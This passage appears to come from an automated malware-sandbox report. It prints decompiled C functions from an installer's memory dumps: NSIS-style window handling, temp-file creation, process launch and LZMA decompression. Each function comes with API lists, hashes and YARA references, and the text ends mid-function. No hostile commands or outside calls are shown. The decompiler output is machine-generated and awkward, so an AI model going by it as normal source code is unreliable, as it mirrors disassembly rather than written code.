                                                                                                    0x00af7c00
                                                                                                    0x00000000
                                                                                                    0x00af7bf9
                                                                                                    0x00af7bf9
                                                                                                    0x00af7bf9
                                                                                                    0x00ab64b0
                                                                                                    0x00ab64b0
                                                                                                    0x00ab64b2
                                                                                                    0x00ab64b2
                                                                                                    0x00ab64b3
                                                                                                    0x00ab64ba
                                                                                                    0x00ab6553
                                                                                                    0x00ab655e
                                                                                                    0x00ab6566
                                                                                                    0x00ab656c
                                                                                                    0x00ab6575
                                                                                                    0x00ab657f
                                                                                                    0x00ab6585
                                                                                                    0x00ab6588
                                                                                                    0x00ab6588
                                                                                                    0x00ab64c7
                                                                                                    0x00ab64cb
                                                                                                    0x00ab64ce
                                                                                                    0x00ab64d3
                                                                                                    0x00ab64da
                                                                                                    0x00ab64e5
                                                                                                    0x00ab64ed
                                                                                                    0x00ab64f1
                                                                                                    0x00ab64f5
                                                                                                    0x00ab64f6
                                                                                                    0x00ab64fa
                                                                                                    0x00ab6502
                                                                                                    0x00ab6503
                                                                                                    0x00ab6504
                                                                                                    0x00ab6507
                                                                                                    0x00ab651a
                                                                                                    0x00ab6524
                                                                                                    0x00ab6524
                                                                                                    0x00ab6526
                                                                                                    0x00ab6526
                                                                                                    0x00ab64aa
                                                                                                    0x00ab652c
                                                                                                    0x00ab652d
                                                                                                    0x00ab652e
                                                                                                    0x00ab6539

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: DebugPrintTimes
                                                                                                    • String ID: 0$0
                                                                                                    • API String ID: 3446177414-203156872
                                                                                                    • Opcode ID: c4a19b9142ea3a0b4b6dd784b792c83f0e22cf21d944e318c9dc28ea2e4fa692
                                                                                                    • Instruction ID: 207edba267a6836731d8262987d7f630a0f72277ec43837dc017e76a2f679471
                                                                                                    • Opcode Fuzzy Hash: c4a19b9142ea3a0b4b6dd784b792c83f0e22cf21d944e318c9dc28ea2e4fa692
                                                                                                    • Instruction Fuzzy Hash: 22415BB16087069FC310CF28C544A6ABBE8FF89714F044A6EF989DB341D735EA45CB96
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00404E54, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 100%
                                                                                                    			E00404E54(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t22;

				if(_a8 != 0x102) {
					if(_a8 != 0x200) {
						_t22 = _a16;
						L7:
						if(_a8 == 0x419 &&  *0x420488 != _t22) {
							 *0x420488 = _t22;
							E00405B66(0x4204a0, 0x424000);
							E00405AC4(0x424000, _t22);
							E0040140B(6);
							E00405B66(0x424000, 0x4204a0);
						}
						L11:
						return CallWindowProcA( *0x420490, _a4, _a8, _a12, _t22);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t22 = _a16;
						goto L11;
					}
					_t22 = E004047D3(_a4, 1);
					_a8 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00403F64(0x413);
				return 0;
			}




                                                                                                    0x00404e60
                                                                                                    0x00404e85
                                                                                                    0x00404ea5
                                                                                                    0x00404ea8
                                                                                                    0x00404eab
                                                                                                    0x00404ec2
                                                                                                    0x00404ec8
                                                                                                    0x00404ecf
                                                                                                    0x00404ed6
                                                                                                    0x00404edd
                                                                                                    0x00404ee2
                                                                                                    0x00404ee8
                                                                                                    0x00000000
                                                                                                    0x00404ef8
                                                                                                    0x00404e92
                                                                                                    0x00404ee5
                                                                                                    0x00404ee5
                                                                                                    0x00000000
                                                                                                    0x00404ee5
                                                                                                    0x00404e9e
                                                                                                    0x00404ea0
                                                                                                    0x00000000
                                                                                                    0x00404ea0
                                                                                                    0x00404e66
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00404e6d
                                                                                                    0x00000000

                                                                                                    APIs
                                                                                                    • IsWindowVisible.USER32(?), ref: 00404E8A
                                                                                                    • CallWindowProcA.USER32 ref: 00404EF8
                                                                                                      • Part of subcall function 00403F64: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 00403F76
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.429792160.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.429781321.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429813163.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429828354.0000000000409000.00000008.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429836549.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: Window$CallMessageProcSendVisible
                                                                                                    • String ID:
                                                                                                    • API String ID: 3748168415-3916222277
                                                                                                    • Opcode ID: 1a28ca64547386e1a64dd11c64f6ae458e1df03769ff3acb3952d776ac0a4b66
                                                                                                    • Instruction ID: 62f3a1a08e098275047049d4f9968a6b4933f6b7f921e7009373277d82a30415
                                                                                                    • Opcode Fuzzy Hash: 1a28ca64547386e1a64dd11c64f6ae458e1df03769ff3acb3952d776ac0a4b66
                                                                                                    • Instruction Fuzzy Hash: D1116D71900208BBDB21AF52DC4499B3669FB84369F00803BF6047A2E2C37C5A519BAD
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00B1FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 53%
                                                                                                    			E00B1FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E00ACCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E00B15720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E00B15720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                                                    0x00b1fdda
                                                                                                    0x00b1fde2
                                                                                                    0x00b1fde5
                                                                                                    0x00b1fdec
                                                                                                    0x00b1fdfa
                                                                                                    0x00b1fdff
                                                                                                    0x00b1fe0a
                                                                                                    0x00b1fe0f
                                                                                                    0x00b1fe17
                                                                                                    0x00b1fe1e
                                                                                                    0x00b1fe19
                                                                                                    0x00b1fe19
                                                                                                    0x00b1fe19
                                                                                                    0x00b1fe20
                                                                                                    0x00b1fe21
                                                                                                    0x00b1fe22
                                                                                                    0x00b1fe25
                                                                                                    0x00b1fe40

                                                                                                    APIs
                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B1FDFA
                                                                                                    Strings
                                                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00B1FE2B
                                                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00B1FE01
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, Offset: 00A60000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.430567360.0000000000B7B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.430581227.0000000000B7F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                                    • API String ID: 885266447-3903918235
                                                                                                    • Opcode ID: 30565464811e1a2718cc21879d1916cb5170740f7680667cf85756dc77de0f14
                                                                                                    • Instruction ID: 02b735c0d8a8883233d592c009200a11a58ccdbbdfb50d70102db669ed818a43
                                                                                                    • Opcode Fuzzy Hash: 30565464811e1a2718cc21879d1916cb5170740f7680667cf85756dc77de0f14
                                                                                                    • Instruction Fuzzy Hash: D3F0C232200601BBE6211A45DC02F63BB9AEB84730F244254F628561E1DA62ACA097A0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040586C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 100%
                                                                                                    			E0040586C(char _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20);
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}








                                                                                                    0x00405870
                                                                                                    0x00405876
                                                                                                    0x00405877
                                                                                                    0x00405877
                                                                                                    0x00405878
                                                                                                    0x0040587f
                                                                                                    0x00405889
                                                                                                    0x00405896
                                                                                                    0x00405899
                                                                                                    0x004058a1
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004058a5
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004058a7
                                                                                                    0x00000000
                                                                                                    0x004058a7
                                                                                                    0x00000000

                                                                                                    APIs
                                                                                                    • GetTickCount.KERNEL32 ref: 0040587F
                                                                                                    • GetTempFileNameA.KERNEL32(?,0061736E,00000000,?), ref: 00405899
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.429792160.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.429781321.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429813163.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429828354.0000000000409000.00000008.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429836549.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: CountFileNameTempTick
                                                                                                    • String ID: nsa
                                                                                                    • API String ID: 1716503409-2209301699
                                                                                                    • Opcode ID: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                                                                                                    • Instruction ID: 7bdb262dbebad2fb51735791196b4a750b565e3ebaa120aaaad2cbe3184e43fd
                                                                                                    • Opcode Fuzzy Hash: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                                                                                                    • Instruction Fuzzy Hash: B1F0A73734820876E7105E55DC04B9B7F9DDF91760F14C027FE44DA1C0D6B49954C7A5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004053C6, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 100%
                                                                                                    			E004053C6(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x4224a8->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x4224a8,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                                                                                    0x004053cf
                                                                                                    0x004053eb
                                                                                                    0x004053f3
                                                                                                    0x004053f8
                                                                                                    0x00000000
                                                                                                    0x004053fe
                                                                                                    0x00405402

                                                                                                    APIs
                                                                                                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004224A8,Error launching installer), ref: 004053EB
                                                                                                    • CloseHandle.KERNEL32(?), ref: 004053F8
                                                                                                    Strings
                                                                                                    • Error launching installer, xrefs: 004053D9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.429792160.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.429781321.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429813163.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429828354.0000000000409000.00000008.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429836549.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: CloseCreateHandleProcess
                                                                                                    • String ID: Error launching installer
                                                                                                    • API String ID: 3712363035-66219284
                                                                                                    • Opcode ID: 3b814a6f076d0ba9038e170a1e0f3647fdefee354992cb10a65e7e77ca0a2381
                                                                                                    • Instruction ID: 069b69ca15cd8b990da55ccc95fe3be7356009797bdfa18ab8f6d6c8c96e71ef
                                                                                                    • Opcode Fuzzy Hash: 3b814a6f076d0ba9038e170a1e0f3647fdefee354992cb10a65e7e77ca0a2381
                                                                                                    • Instruction Fuzzy Hash: A3E0ECB4A00219BFDB00AF64ED49AAB7BBDEB00305F90C522A911E2150D775D8118AB9
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00406566, Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 99%
                                                                                                    			E00406566() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M004069D4))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600);
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8));
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40));
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
